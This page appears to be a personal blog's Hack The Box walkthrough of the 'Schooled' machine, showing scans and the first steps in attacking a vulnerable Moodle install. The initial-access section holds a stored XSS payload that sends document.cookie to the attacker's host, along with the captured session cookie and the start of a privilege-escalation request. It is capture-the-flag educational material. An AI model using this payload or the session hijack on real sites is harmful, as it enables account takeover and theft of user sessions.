<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.24.0 by Michael Rose
  Copyright 2013-2020 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->
<html lang="en" class="no-js">
  <head>
    <!-- start custom head snippets -->
<!-- Begin Jekyll GTM tag v1.0.3 -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MF4PLJ5');</script>
<!-- End Jekyll GTM tag v1.0.3 -->


<!-- insert favicons. use https://realfavicongenerator.net/ -->
<link rel="shortcut icon" href="/assets/images/favicon.ico" />

<!-- Multilang tags -->

    
<link rel="alternate" hreflang="pt-BR" href="https://davicruz.com/walkthrough/2021/09/htb-schooled">
<link rel="alternate" hreflang="x-default" href="https://davicruz.com/walkthrough/2021/09/htb-schooled">
    

    
<link rel="alternate" hreflang="en-US" href="https://davicruz.com/en-US/walkthrough/2021/09/htb-schooled">
        
<link rel="alternate" hreflang="en" href="https://davicruz.com/en-US/walkthrough/2021/09/htb-schooled">
        
    


<!-- end custom head snippets -->

    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>Walktrough: HTB Schooled | Davi Cruz</title>
<meta name="description" content="Hello guys!  This week’s machine will be Schooled, another medium-rated Linux box from Hack The Box, created by TheCyberGeek.">


  <meta name="author" content="Davi Cruz">
  
  <meta property="article:author" content="Davi Cruz">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Davi Cruz">
<meta property="og:title" content="Walktrough: HTB Schooled">
<meta property="og:url" content="https://davicruz.com/walkthrough/2021/09/htb-schooled">


  <meta property="og:description" content="Hello guys!  This week’s machine will be Schooled, another medium-rated Linux box from Hack The Box, created by TheCyberGeek.">



  <meta property="og:image" content="https://i.imgur.com/ksBoJIQ.png">



  <meta name="twitter:site" content="@zerahzurc">
  <meta name="twitter:title" content="Walktrough: HTB Schooled">
  <meta name="twitter:description" content="Hello guys!  This week’s machine will be Schooled, another medium-rated Linux box from Hack The Box, created by TheCyberGeek.">
  <meta name="twitter:url" content="https://davicruz.com/walkthrough/2021/09/htb-schooled">

  
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content="https://i.imgur.com/ksBoJIQ.png">
  

  



  <meta property="article:published_time" content="2021-09-11T00:00:00-03:00">





  

  


<link rel="canonical" href="https://davicruz.com/walkthrough/2021/09/htb-schooled">




<script type="application/ld+json">
  {
    "@context": "https://schema.org",
    
      "@type": "Person",
      "name": "Davi Cruz",
      "url": "https://davicruz.com/",
      "sameAs": ["https://twitter.com/zerahzurc","https://www.linkedin.com/in/davicruz","https://github.com/davi-cruz"]
    
  }
</script>


  <meta name="google-site-verification" content="hrWV-PqvbpxEy2HdpVYFQNws2Sz_tROleVyF18s2kWA" />


  <meta name="msvalidate.01" content="60B1FA6CDAF15D226AB529AF30386BD8">



  <meta name="yandex-verification" content="08de8d8c0326420f">



<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Davi Cruz Feed">


<!-- https://t.co/dKP3o1e -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script>
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5/css/all.min.css"></noscript>



  </head>

  <body class="layout--single wide">
    <!-- Begin Jekyll GTM tag v1.0.3 (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MF4PLJ5" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Jekyll GTM tag v1.0.3 (noscript) -->

    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        <!-- CUSTOM: Edit to adjust links to localized page -->
        
        
          <a class="site-logo" href="/en-US"><img src="/assets/images/logo.png" alt="Davi Cruz"></a>
        
        <a class="site-title" href="/en-US">
          Davi Cruz
          
        </a>
        
        <!-- END CUSTOM: Edit to adjust links to localized page -->
        <ul class="visible-links">
          <!-- CUSTOM: Edit to get localized navigation --><li class="masthead__menu-item">
              <a href="/en-US/categories/">Categories</a>
            </li>
<li class="masthead__menu-item">
              <a href="/en-US/tag/">Tags</a>
            </li>
<li class="masthead__menu-item">
              <a href="/en-US/about/">About</a>
            </li>
<!-- END CUSTOM: Edit to get localized navigation -->
        </ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="https://davicruz.com/">
        <img src="/assets/images/bio-photo.jpg" alt="Davi Cruz" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="https://davicruz.com/" itemprop="url">Davi Cruz</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>Just another Cybersecurity professional</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name" class="p-locality">São Paulo, BR</span>
        </li>
      

      
        
          
            <li><a href="https://linkedin.com/in/davicruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fab fa-linkedin" aria-hidden="true"></i><span class="label">Linkedin</span></a></li>
          
        
          
            <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">Twitter</span></a></li>
          
        
          
            <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
  </div>



  <article class="page h-entry" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="Walktrough: HTB Schooled">
    <meta itemprop="description" content="Hello guys!This week’s machine will be Schooled, another medium-rated Linux box from Hack The Box, created by TheCyberGeek.">
    <meta itemprop="datePublished" content="2021-09-11T00:00:00-03:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title p-name" itemprop="headline">
            <a href="https://davicruz.com/walkthrough/2021/09/htb-schooled" class="u-url" itemprop="url">Walktrough: HTB Schooled
</a>
          </h1>
          

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-calendar-alt" aria-hidden="true"></i>
        
        <time datetime="2021-09-11T00:00:00-03:00">September 11, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          11 minute read
        
      </span>
    

    <!-- CUSTOM: Post Meta attributes and links -->
    <span class="page__meta-sep page__meta-lang"></span>
    
    
    
    <span class="page__meta-lang"><a href="/walkthrough/2021/09/htb-schooled">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
    

    

    

    
    
    
    
    
  <span class="page__meta-sep page__meta-share"></span>
  <span class="page__meta-share">
    <i class="fas fa-share-alt" aria-hidden="true"></i>
    <a href="#sharelinks">Share</a>
  </span>
    <!-- END CUSTOM: Post Meta attributes and links -->
  </p>


        </header>
      

      <section class="page__content e-content" itemprop="text">
        
        <p>Hello guys!</p>

<p>This week’s machine will be <strong>Schooled</strong>, another medium-rated Linux box from <a href="https://www.hackthebox.eu/">Hack The Box</a>, created by <a href="https://app.hackthebox.eu/users/114053">TheCyberGeek</a>.<!--more--></p>

<p class="notice--info"><img class="emoji" title=":information_source:" alt=":information_source:" src="https://github.githubassets.com/images/icons/emoji/unicode/2139.png" height="20" width="20"> <strong>Info</strong>: Write-ups for Hack The Box machines are posted as soon as they’re retired.</p>

<p><img src="https://i.imgur.com/qw8zycI.png" alt="HTB Schooled" class="align-center"></p>

<p>To solve this box, I was required to exploit two CVEs for a vulnerable Moodle Version, which was the hardest part once the PoC available didn’t work and spent some time understanding the required steps and then getting the initial foothold. After that, all went fine, obtaining creds from Moodle database and then abusing over-permissive <code class="language-plaintext highlighter-rouge">sudo</code> configurations.</p>

<p>I hope you guys enjoy it!</p>

<h2 id="enumeration">Enumeration</h2>

<p>As usual, started by running a <code class="language-plaintext highlighter-rouge">nmap</code> quick scan to see which services are currently published</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-Pn</span> <span class="nt">-oA</span> quick 10.10.10.234
Host discovery disabled <span class="o">(</span><span class="nt">-Pn</span><span class="o">)</span><span class="nb">.</span> All addresses will be marked <span class="s1">'up'</span> and scan <span class="nb">times </span>will be slower.
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-08-01 14:41 <span class="nt">-03</span>
Nmap scan report <span class="k">for </span>10.10.10.234
Host is up <span class="o">(</span>0.077s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9 <span class="o">(</span>FreeBSD 20200214<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc <span class="o">(</span>RSA<span class="o">)</span>
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.46 <span class="o">((</span>FreeBSD<span class="o">)</span> PHP/7.4.15<span class="o">)</span>
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 <span class="o">(</span>FreeBSD<span class="o">)</span> PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
Service Info: OS: FreeBSD<span class="p">;</span> CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>16.06 seconds
</code></pre></div></div>

<p>In parallel, after the initial scan, was also able to enumerate the port 33060/TCP, resulting in the following output:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>nmap <span class="nt">-p</span> 80,33060 <span class="nt">-A</span> <span class="nt">-oA</span> Full 10.10.10.234                                                                                     
Starting Nmap 7.91 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2021-08-01 14:57 <span class="nt">-03</span>
Nmap scan report <span class="k">for </span>schooled.htb <span class="o">(</span>10.10.10.234<span class="o">)</span>
Host is up <span class="o">(</span>0.077s latency<span class="o">)</span><span class="nb">.</span>

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.46 <span class="o">((</span>FreeBSD<span class="o">)</span> PHP/7.4.15<span class="o">)</span>
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 <span class="o">(</span>FreeBSD<span class="o">)</span> PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
33060/tcp open  mysqlx?
| fingerprint-strings:
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
|     Invalid message<span class="s2">"
|     HY000
|   LDAPBindReq:
|     *Parse error unserializing protobuf message"</span>
|     HY000
|   oracle-tns:
|     Invalid message-frame.<span class="s2">"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.91%I=7%D=8/1%Time=6106E084%P=x86_64-pc-linux-gnu%r(NU
SF:LL,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(GenericLines,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>
SF:08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(GetRequest,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(HTTPOpt
SF:ions,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(RTSPRequest,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\</span>
SF:x08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(RPCCheck,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(DNSVersi
SF:onBindReqTCP,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(DNSStatusRequestTCP,2B
SF:,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0\x</span>1e<span class="se">\0\0\0\x</span>01<span class="se">\x</span>08<span class="se">\x</span>01<span class="se">\x</span>10<span class="se">\x</span>88<span class="s1">'\x1a\x0fIn
SF:valid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
SF:r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\
SF:x10\x88'</span><span class="se">\x</span>1a<span class="se">\x</span>0fInvalid<span class="se">\x</span>20message<span class="se">\"\x</span>05HY000<span class="s2">")%r(TerminalServerCookie,
SF:9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(TLSSessionReq,2B,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>0
SF:8<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0\x</span>1e<span class="se">\0\0\0\x</span>01<span class="se">\x</span>08<span class="se">\x</span>01<span class="se">\x</span>10<span class="se">\x</span>88<span class="s1">'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,
SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'</span><span class="se">\x</span>1a<span class="se">\x</span>0fInvalid<span class="se">\x</span>20message<span class="se">\"\x</span>05HY00
SF:0<span class="s2">")%r(FourOhFourRequest,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(LPDString,9
SF:,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(LDAPSearchReq,2B,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08
SF:<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0\x</span>1e<span class="se">\0\0\0\x</span>01<span class="se">\x</span>08<span class="se">\x</span>01<span class="se">\x</span>10<span class="se">\x</span>88<span class="s1">'\x1a\x0fInvalid\x20message\"\x
SF:05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\x
SF:08\x01\x10\x88'</span><span class="se">\x</span>1a<span class="se">\*</span>Parse<span class="se">\x</span>20error<span class="se">\x</span>20unserializing<span class="se">\x</span>20protobuf<span class="se">\x</span>20mes
SF:sage<span class="se">\"\x</span>05HY000<span class="s2">")%r(SIPOptions,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(LAND
SF:esk-RC,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(TerminalServer,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0</span>
SF:<span class="se">\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(NCP,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0</span><span class="s2">")%r(NotesRPC
SF:,2B,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0\x</span>1e<span class="se">\0\0\0\x</span>01<span class="se">\x</span>08<span class="se">\x</span>01<span class="se">\x</span>10<span class="se">\x</span>88<span class="s1">'\x1a\x0
SF:fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,32,"\
SF:x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'</span><span class="se">\x</span>1a<span class="se">\x</span>16Invalid<span class="se">\</span>
SF:x20message-frame<span class="se">\.\"\x</span>05HY000<span class="s2">")%r(ms-sql-s,9,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1
SF:a<span class="se">\0</span><span class="s2">")%r(afp,2B,"</span><span class="se">\x</span>05<span class="se">\0\0\0\x</span>0b<span class="se">\x</span>08<span class="se">\x</span>05<span class="se">\x</span>1a<span class="se">\0\x</span>1e<span class="se">\0\0\0\x</span>01<span class="se">\x</span>08<span class="se">\x</span>01<span class="se">\x</span>10<span class="se">\</span>
SF:x88<span class="s1">'\x1a\x0fInvalid\x20message\"\x05HY000");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.96 seconds
</span></code></pre></div></div>

<h3 id="80tcp---http-service">80/TCP - HTTP Service</h3>

<p>Accessing this initial page, we can see an institutional page of a School, which also mentions that all content is delivered using <strong>Moodle</strong>, that we might need to find it to dig a little further on it.</p>

<p><img src="https://i.imgur.com/hy0QFcA.png" alt="HTB Schooled - Institutional Page" class="align-center"></p>

<p>Also, by running <code class="language-plaintext highlighter-rouge">whatweb</code> I have found an e-mail address <strong>admissions@schooled.htb</strong> where <code class="language-plaintext highlighter-rouge">schooled.htb</code> might be the domain name for this machine, which was later added to the hosts file.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>whatweb <span class="nt">--color</span><span class="o">=</span>never <span class="nt">-a</span> 3 10.10.10.234
http://10.10.10.234 <span class="o">[</span>200 OK] Apache[2.4.46], Bootstrap[4.1.0], Country[RESERVED][ZZ], Email[#,admissions@schooled.htb], HTML5, HTTPServer[FreeBSD][Apache/2.4.46 <span class="o">(</span>FreeBSD<span class="o">)</span> PHP/7.4.15], IP[10.10.10.234], PHP[7.4.15], Script, Title[Schooled - A new kind of educational institute], X-UA-Compatible[IE<span class="o">=</span>edge]
</code></pre></div></div>

<p>While left <code class="language-plaintext highlighter-rouge">gobuster</code> running in the background to check other pages in the site, started another instance <strong>enumerating subdomains</strong> and have found both <strong>moodle</strong> and <strong>student</strong>, also later added to the local hosts file.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>gobuster dns <span class="nt">-d</span> schooled.htb <span class="nt">-w</span> /usr/share/dnsrecon/subdomains-top1mil-5000.txt
<span class="o">===============================================================</span>
Gobuster v3.1.0
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Domain:     schooled.htb
<span class="o">[</span>+] Threads:    10
<span class="o">[</span>+] Timeout:    1s
<span class="o">[</span>+] Wordlist:   /usr/share/dnsrecon/subdomains-top1mil-5000.txt
<span class="o">===============================================================</span>
2021/08/01 17:24:31 Starting gobuster <span class="k">in </span>DNS enumeration mode
<span class="o">===============================================================</span>
Found: moodle.schooled.htb
Found: student.schooled.htb

<span class="o">===============================================================</span>
2021/08/01 17:25:04 Finished
<span class="o">===============================================================</span>
</code></pre></div></div>

<p>The subdomain <code class="language-plaintext highlighter-rouge">student.schooled.htb</code> was redirecting to the main page while <code class="language-plaintext highlighter-rouge">moodle.schooled.htb</code> was redirecting to the page below, a Moodle site that could allow us to gather some additional information, allowing us to have an initial foothold or even an RCE based on existing vulnerabilities.</p>

<p><img src="https://i.imgur.com/Sx32BwP.png" alt="HTB Schooled - Moodle" class="align-center"></p>

<p>Starting with Moodle site enumeration, ran <a href="https://github.com/inc0d3/moodlescan">moodlescan</a>, a script that helps us to enumerate Moodle version, which returned <strong>3.9.0-beta</strong> as output below.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python3 moodlescan.py <span class="nt">-u</span> http://moodle.schooled.htb/moodle

Version 0.8 - May/2021
.............................................................................................................

By Victor Herrera - supported by www.incode.cl

.............................................................................................................

Getting server information http://moodle.schooled.htb/moodle ...

server          : Apache/2.4.46 <span class="o">(</span>FreeBSD<span class="o">)</span> PHP/7.4.15
x-powered-by    : PHP/7.4.15
x-frame-options : sameorigin
last-modified   : Mon, 02 Aug 2021 11:54:53 GMT

Getting moodle version...

Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta

Searching vulnerabilities...


Vulnerabilities found: 0

Scan completed.
</code></pre></div></div>

<p>Considering this version, did a quick search on the version. Found out that several vulnerabilities were present but would require some permissions that I still don’t have. So decided to proceed on creating an account to poke a little inside the platform, considering that nothing was available for guests.</p>

<p>While creating the account, noticed a requirement for an e-mail account from <strong>student.schooled.htb</strong> subdomain, previously enumerated using <code class="language-plaintext highlighter-rouge">gobuster dns</code>.</p>

<p>Besides the e-mail domain requirement, e-mail validation wasn’t required and with access to the platform started to browse the contents, to which I was only able to self-enroll to Mathematics class, where was found the following announcement:</p>

<blockquote>
  <p>Reminder for joining students
by Manuel Phillips - Wednesday, 23 December 2020, 12:01 AM
Number of replies: 0
This is a self enrollment course. For students who wish to attend my lectures be sure that you have your MoodleNet profile set.</p>

  <p>Students who do not set their MoodleNet profiles will be removed from the course before the course is due to start and I will be checking all students who are enrolled on this course.</p>

  <p>Look forward to seeing you all soon.</p>

  <p>Manuel Phillips</p>
</blockquote>

<p>This means that teacher Manuel Philips will check all MoodleNet profiles for all enrolled students and, in case we can store an XSS on it, we might be able to steal the teacher’s session and enumerate further the platform while searching for an RCE opportunity.</p>

<h2 id="initial-access">Initial access</h2>

<p>Searching for <strong>MoodleNet XSS</strong>, I came across a <a href="https://moodle.org/mod/forum/discuss.php?d=410839">Security Announcement</a> from Moodle mentioning the <strong>CVE-2020-25627</strong>, which was fixed in version 3.9.2 and affected versions 3.9 and 3.9.1, that matches our scenario.</p>

<p>Searching for a PoC for the related CVE, found the repo <a href="https://github.com/HoangKien1020/CVE-2020-25627">HoangKien1020/CVE-2020-25627: Stored XSS via moodlenetprofile parameter in user profile (github.com)</a> containing the instructions to exploit it, which was implemented and permitted us to obtain teacher’s session cookie as evidence below:</p>

<ul>
  <li>Logged as the recently created user and modified the MoodleNet profile with the following content</li>
</ul>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;script&gt;</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="k">new</span> <span class="nx">Image</span><span class="p">;</span><span class="nx">i</span><span class="p">.</span><span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">http://10.10.10.10/xss.php?</span><span class="dl">"</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">;</span><span class="nt">&lt;/script&gt;</span>
</code></pre></div></div>

<ul>
  <li>Hosted the <code class="language-plaintext highlighter-rouge">xss.php</code> in a folder and started a local PHP webserver, which 2 minutes later displayed us the teacher’s cookie on the page</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">sudo </span>php <span class="nt">-S</span> 0.0.0.0:80 <span class="nt">-t</span> <span class="nb">.</span>
<span class="o">[</span>Mon Aug  9 14:44:05 2021] PHP 7.4.21 Development Server <span class="o">(</span>http://0.0.0.0:80<span class="o">)</span> started
<span class="o">[</span>Mon Aug  9 14:45:28 2021] 10.10.10.234:55102 Accepted
<span class="o">[</span>Mon Aug  9 14:45:28 2021] PHP Notice:  Undefined index: METHOD <span class="k">in</span> /opt/dcruz/htb/schooled-10.10.10.234/exploit/www/xss.php on line 28
<span class="o">[</span>Mon Aug  9 14:45:28 2021] PHP Notice:  Undefined index: REMOTE_HOST <span class="k">in</span> /opt/dcruz/htb/schooled-10.10.10.234/exploit/www/xss.php on line 29
<span class="o">[</span>Mon Aug  9 14:45:28 2021] 10.10.10.234:55102 <span class="o">[</span>200]: GET /xss.php?MoodleSession<span class="o">=</span>d8so1t4rs4vmg8btrgfr2ps6fr
<span class="o">[</span>Mon Aug  9 14:45:28 2021] 10.10.10.234:55102 Closing

</code></pre></div></div>

<p>Now aware of this Session parameter, changed it in browser and we can now see in the upper right corner that I’m connected as Manuel Philips</p>

<p><img src="https://i.imgur.com/n3plh19.png" alt="HTB Schooled - Moodle as Manuel Philips" class="align-center"></p>

<p>Now that I have a more privileged access as a teacher, we need to check if current permissions (Teacher) are enough to get an RCE.</p>

<p>Searching about Moodle Exploitation on <a href="https://book.hacktricks.xyz/pentesting/pentesting-web/moodle#rce">Moodle - HackTricks</a> page, found out that I need to be a manager to upload a plugin, which can host malicious code to our purpose. Besides not having the appropriate permission noticed that version <strong>is also vulnerable to a</strong> <a href="https://moodle.org/mod/forum/discuss.php?d=407393"><strong>Privilege Escalation Vulnerability</strong></a>, which could allow me to get manager permission in the course abusing the enrollment process and, if a student is the Site Manager, I could impersonate him and upload the malicious plugin, obtaining RCE. The same author of the other CVE has also <a href="https://github.com/HoangKien1020/CVE-2020-14321">a repository in Github</a> containing a PoC that could help us to escalate those privileges and get RCE.</p>

<p>Besides not working well in our scenario, understanding the steps required used in the exploit, the following steps were executed to be able to get RCE:</p>

<ul>
  <li>The first thing would identify who in the platform could have manager permissions. Based on the institutional page, <strong>Lianne Carter</strong> is the school’s manager and possibly has the rights we need.</li>
  <li>Also took note of <strong>Manuel Philips</strong>’ Profile id, which was obtained from his profile page at <code class="language-plaintext highlighter-rouge">http://moodle.schooled.htb/moodle/user/profile.php?id=24</code>.</li>
  <li>Things started by enrolling the school’s manager in the class and, intercepting the request and sending a copy of it to Burp’s Repeater, also crafted a request granting us Manager Administration in the course, by assigning us the <code class="language-plaintext highlighter-rouge">roleid=1</code> in the request, as well as changing the assignee id to Manuel Philips, the same way as seen in the PoC video.</li>
</ul>

